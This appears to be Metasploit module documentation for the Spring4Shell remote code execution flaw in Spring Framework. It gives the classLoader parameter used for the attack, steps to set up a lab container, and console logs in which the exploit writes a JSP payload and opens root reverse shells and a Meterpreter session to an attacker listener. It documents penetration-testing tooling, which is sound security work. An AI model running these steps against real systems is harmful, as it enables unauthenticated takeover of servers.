## Vulnerable Application

Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions when running on JDK 9 or above 
and specifically packaged as a traditional WAR and deployed in a standalone Tomcat instance are vulnerable 
to remote code execution due to an unsafe data binding used to populate an object from request parameters 
to set a Tomcat specific ClassLoader. By crafting a request to the application and referencing the 
org.apache.catalina.valves.AccessLogValve class through the classLoader with parameters such as the following:
class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp, an unauthenticated attacker can 
gain remote code execution.

## Verification Steps

1. Build the application
   1. `git clone https://github.com/vleminator/Spring4Shell-POC`
   2. `docker build . -t spring4shell`
2. Run the application
   1. `docker run -p 8085:8080 spring4shell`
3. Start msfconsole
4. Run: `use exploit/multi/http/spring_framework_rce_spring4shell`
5. Set the `RHOSTS`, `TARGET`, `PAYLOAD` and payload associated datastore options
6. Run the exploit

## Options
### HTTP_METHOD
HTTP method to use for checking and exploitation. If set to `Automatic` (the default value), the method will be
automatically identified. Automatically identifying the HTTP method uses the check method.

### PAYLOAD_PATH
Path to write the payload. This is relative to the tomcat installation directory.

## Scenarios

### Target Java (vulhub container)

The target is the [vulhub container](https://github.com/vulhub/vulhub/tree/master/spring/CVE-2022-22965) which uses the
GET HTTP method.

```
msf6 > use exploit/multi/http/spring_framework_rce_spring4shell 
[*] No payload configured, defaulting to generic/shell_reverse_tcp
msf6 exploit(multi/http/spring_framework_rce_spring4shell) > show options 

Module options (exploit/multi/http/spring_framework_rce_spring4shell):

   Name          Current Setting                 Required  Description
   ----          ---------------                 --------  -----------
   HTTP_METHOD   Automatic                       no        HTTP method to use (Accepted: Automatic, GET, POST)
   PAYLOAD_PATH  webapps/ROOT                    yes       Path to write the payload
   Proxies                                       no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                                        yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT         8080                            yes       The target port (TCP)
   SSL           false                           no        Negotiate SSL/TLS for outgoing connections
   TARGETURI     /                               yes       The path to the application action
   VHOST                                         no        HTTP server virtual host


Payload options (generic/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.250.134  yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Java


msf6 exploit(multi/http/spring_framework_rce_spring4shell) > set PAYLOAD java/jsp_shell_reverse_tcp 
PAYLOAD => java/jsp_shell_reverse_tcp
msf6 exploit(multi/http/spring_framework_rce_spring4shell) > exploit http://192.168.159.128:8080/

[*] Started reverse TCP handler on 192.168.250.134:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[+] Automatically identified HTTP method: GET
[*] 192.168.159.128:8080 - Generating JSP...
[*] 192.168.159.128:8080 - Modifying Class Loader...
[*] 192.168.159.128:8080 - Waiting for the server to flush the logfile
[*] 192.168.159.128:8080 - Executing JSP payload at http://192.168.159.128:8080/MUpts6425.jsp
[+] 192.168.159.128:8080 - Log file flushed
[*] Command shell session 1 opened (192.168.250.134:4444 -> 172.19.0.2:47418 ) at 2022-05-05 10:47:50 -0400

id
uid=0(root) gid=0(root) groups=0(root)
pwd
/usr/local/tomcat
```

### Target Linux (x64)

The target is the [vleminator container](https://github.com/vleminator/Spring4Shell-POC) which uses the
POST HTTP method.

```
msf6 > use exploit/multi/http/spring_framework_rce_spring4shell
[*] Using configured payload java/jsp_shell_reverse_tcp
msf6 exploit(multi/http/spring_framework_rce_spring4shell) > set TARGET Linux 
TARGET => Linux
msf6 exploit(multi/http/spring_framework_rce_spring4shell) > set PAYLOAD linux/x64/meterpreter/reverse_tcp 
PAYLOAD => linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/http/spring_framework_rce_spring4shell) > show options 

Module options (exploit/multi/http/spring_framework_rce_spring4shell):

   Name          Current Setting                 Required  Description
   ----          ---------------                 --------  -----------
   HTTP_METHOD   Automatic                       no        HTTP method to use (Accepted: Automatic, GET, POST)
   PAYLOAD_PATH  webapps/ROOT                    yes       Path to write the payload
   Proxies                                       no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                                        yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT         8080                            yes       The target port (TCP)
   SSL           false                           no        Negotiate SSL/TLS for outgoing connections
   TARGETURI     /app/example/HelloWorld.action  yes       The path to the application action
   VHOST                                         no        HTTP server virtual host


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.250.134  yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Linux


msf6 exploit(multi/http/spring_framework_rce_spring4shell) > exploit http://192.168.159.128:8085/helloworld/greeting

[*] Started reverse TCP handler on 192.168.250.134:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[+] Automatically identified HTTP method: POST
[*] 192.168.159.128:8085 - Generating JSP...
[*] 192.168.159.128:8085 - Modifying Class Loader...
[*] 192.168.159.128:8085 - Waiting for the server to flush the logfile
[*] 192.168.159.128:8085 - Executing JSP payload at http://192.168.159.128:8085/S0J17.jsp
[+] 192.168.159.128:8085 - Log file flushed
[*] Sending stage (3020772 bytes) to 172.17.0.2
[+] Deleted /tmp/6DKA
[*] Meterpreter session 2 opened (192.168.250.134:4444 -> 172.17.0.2:54902 ) at 2022-05-05 10:52:35 -0400

meterpreter > getuid
Server username: root
meterpreter > pwd
/helloworld
meterpreter > sysinfo
Computer     : 172.17.0.2
OS           : Debian 11.2 (Linux 5.17.4-100.fc34.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > 
```
